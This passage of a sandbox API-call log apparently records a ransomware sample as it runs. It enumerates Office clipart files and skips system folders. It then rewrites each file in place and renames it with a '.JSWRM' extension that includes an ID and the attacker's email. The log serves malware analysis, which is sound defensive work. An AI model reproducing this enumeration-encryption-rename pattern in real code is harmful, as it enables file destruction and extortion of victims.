HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0076.574] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0076.574] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01628_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01628_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01628_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01628_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0076.574] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0076.574] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0076.574] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0076.574] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7100f8, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe7100f8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe736331, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x244, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="DD01629_.WMF", cAlternateFileName="")) returned 1 [0076.574] lstrcmpiW (lpString1="DD01629_.WMF", lpString2=".") returned 1 [0076.574] lstrcmpiW (lpString1="DD01629_.WMF", lpString2="..") returned 1 [0076.574] lstrcmpiW (lpString1="DD01629_.WMF", lpString2="...") returned 1 [0076.574] lstrcmpiW (lpString1="DD01629_.WMF", lpString2="windows") returned -1 [0076.574] lstrcmpiW (lpString1="DD01629_.WMF", lpString2="recovery") returned -1 [0076.574] lstrcmpiW (lpString1="DD01629_.WMF", lpString2="perflogs") returned -1 [0076.574] lstrcmpiW (lpString1="DD01629_.WMF", lpString2="documents and settings") returned -1 [0076.574] lstrcmpiW (lpString1="DD01629_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0076.574] lstrcmpiW (lpString1="DD01629_.WMF", lpString2="system volume information") returned -1 [0076.574] lstrcmpiW (lpString1="DD01629_.WMF", lpString2="msocache") returned -1 [0076.574] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0076.574] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01629_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.574] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01629_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01629_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.574] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0076.575] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0076.575] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01629_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.575] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01629_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01629_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.575] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0076.575] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0076.575] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0076.575] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0076.575] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0076.575] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0076.575] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01629_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01629_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0076.575] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=580) returned 1 [0076.576] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.576] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x240) returned 0x2335b0 [0076.576] ReadFile (in: hFile=0x314, lpBuffer=0x2335b0, nNumberOfBytesToRead=0x240, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2335b0*, lpNumberOfBytesRead=0x345e89c*=0x240, lpOverlapped=0x0) returned 1 [0076.577] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.577] WriteFile (in: hFile=0x314, lpBuffer=0x2335b0*, nNumberOfBytesToWrite=0x240, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2335b0*, lpNumberOfBytesWritten=0x345e898*=0x240, lpOverlapped=0x0) returned 1 [0076.577] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2335b0 | out: hHeap=0x1e0000) returned 1 [0076.577] CloseHandle (hObject=0x314) returned 1 [0076.577] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0076.577] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0076.577] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0076.577] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0076.577] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0076.577] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0076.577] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0076.577] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0076.577] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0076.577] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0076.577] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0076.577] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0076.577] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0076.577] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0076.577] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01629_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01629_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01629_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01629_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0076.578] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0076.578] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0076.578] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0076.578] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdbe306f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdbe306f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdbe306f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x128, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="DD01630_.WMF", cAlternateFileName="")) returned 1 [0076.579] lstrcmpiW (lpString1="DD01630_.WMF", lpString2=".") returned 1 [0076.579] lstrcmpiW (lpString1="DD01630_.WMF", lpString2="..") returned 1 [0076.579] lstrcmpiW (lpString1="DD01630_.WMF", lpString2="...") returned 1 [0076.579] lstrcmpiW (lpString1="DD01630_.WMF", lpString2="windows") returned -1 [0076.579] lstrcmpiW (lpString1="DD01630_.WMF", lpString2="recovery") returned -1 [0076.580] lstrcmpiW (lpString1="DD01630_.WMF", lpString2="perflogs") returned -1 [0076.580] lstrcmpiW (lpString1="DD01630_.WMF", lpString2="documents and settings") returned -1 [0076.580] lstrcmpiW (lpString1="DD01630_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0076.580] lstrcmpiW (lpString1="DD01630_.WMF", lpString2="system volume information") returned -1 [0076.580] lstrcmpiW (lpString1="DD01630_.WMF", lpString2="msocache") returned -1 [0076.580] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0076.580] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01630_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.580] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01630_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01630_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.580] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0076.580] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0076.580] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01630_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.580] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01630_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01630_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.580] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0076.580] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0076.580] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0076.580] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0076.580] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0076.580] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0076.580] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01630_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01630_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0076.580] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=296) returned 1 [0076.580] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.580] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f4d0 [0076.580] ReadFile (in: hFile=0x314, lpBuffer=0x23f4d0, nNumberOfBytesToRead=0x120, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23f4d0*, lpNumberOfBytesRead=0x345e89c*=0x120, lpOverlapped=0x0) returned 1 [0076.581] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.581] WriteFile (in: hFile=0x314, lpBuffer=0x23f4d0*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23f4d0*, lpNumberOfBytesWritten=0x345e898*=0x120, lpOverlapped=0x0) returned 1 [0076.581] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f4d0 | out: hHeap=0x1e0000) returned 1 [0076.582] CloseHandle (hObject=0x314) returned 1 [0076.582] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0076.582] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0076.582] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0076.582] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0076.582] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0076.582] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0076.582] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0076.582] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0076.582] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0076.582] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0076.582] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0076.582] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0076.582] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0076.582] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0076.582] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01630_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01630_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01630_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01630_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0076.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0076.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0076.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0076.583] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdbe306f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdbe306f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe7100f8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x228, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="DD01631_.WMF", cAlternateFileName="")) returned 1 [0076.583] lstrcmpiW (lpString1="DD01631_.WMF", lpString2=".") returned 1 [0076.583] lstrcmpiW (lpString1="DD01631_.WMF", lpString2="..") returned 1 [0076.583] lstrcmpiW (lpString1="DD01631_.WMF", lpString2="...") returned 1 [0076.583] lstrcmpiW (lpString1="DD01631_.WMF", lpString2="windows") returned -1 [0076.583] lstrcmpiW (lpString1="DD01631_.WMF", lpString2="recovery") returned -1 [0076.583] lstrcmpiW (lpString1="DD01631_.WMF", lpString2="perflogs") returned -1 [0076.583] lstrcmpiW (lpString1="DD01631_.WMF", lpString2="documents and settings") returned -1 [0076.583] lstrcmpiW (lpString1="DD01631_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0076.583] lstrcmpiW (lpString1="DD01631_.WMF", lpString2="system volume information") returned -1 [0076.583] lstrcmpiW (lpString1="DD01631_.WMF", lpString2="msocache") returned -1 [0076.583] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0076.583] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01631_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.583] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01631_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01631_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0076.583] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0076.583] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01631_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.583] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DD01631_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DD01631_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0076.583] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0076.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0076.583] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0076.583] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0076.583] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0076.584] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01631_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01631_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0076.584] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=552) returned 1 [0076.584] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.584] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x220) returned 0x209950 [0076.584] ReadFile (in: hFile=0x314, lpBuffer=0x209950, nNumberOfBytesToRead=0x220, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x209950*, lpNumberOfBytesRead=0x345e89c*=0x220, lpOverlapped=0x0) returned 1 [0076.585] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.585] WriteFile (in: hFile=0x314, lpBuffer=0x209950*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x209950*, lpNumberOfBytesWritten=0x345e898*=0x220, lpOverlapped=0x0) returned 1 [0076.585] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209950 | out: hHeap=0x1e0000) returned 1 [0076.585] CloseHandle (hObject=0x314) returned 1 [0076.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0076.585] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0076.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0076.585] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0076.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0076.585] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0076.585] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0076.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0076.585] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0076.585] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0076.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0076.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0076.585] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0076.585] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0076.585] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01631_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01631_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01631_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01631_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0076.592] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0076.592] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0076.592] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0076.592] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdbe306f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdbe306f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdbe306f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1034, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="DD01761_.WMF", cAlternateFileName="")) returned 1 [0076.592] lstrcmpiW (lpString1="DD01761_.WMF", lpString2=".") returned 1 [0076.592] lstrcmpiW (lpString1="DD01761_.WMF", lpString2="..") returned 1 [0076.592] lstrcmpiW (lpString1="DD01761_.WMF", lpString2="...") returned 1 [0076.592] lstrcmpiW (lpString1="DD01761_.WMF", lpString2="windows") returned -1 [0076.592] lstrcmpiW (lpString1="DD01761_.WMF", lpString2="recovery") returned -1 [0076.592] lstrcmpiW (lpString1="DD01761_.WMF", lpString2="perflogs") returned -1 [0076.592] lstrcmpiW (lpString1="DD01761_.WMF", lpString2="documents and settings") returned 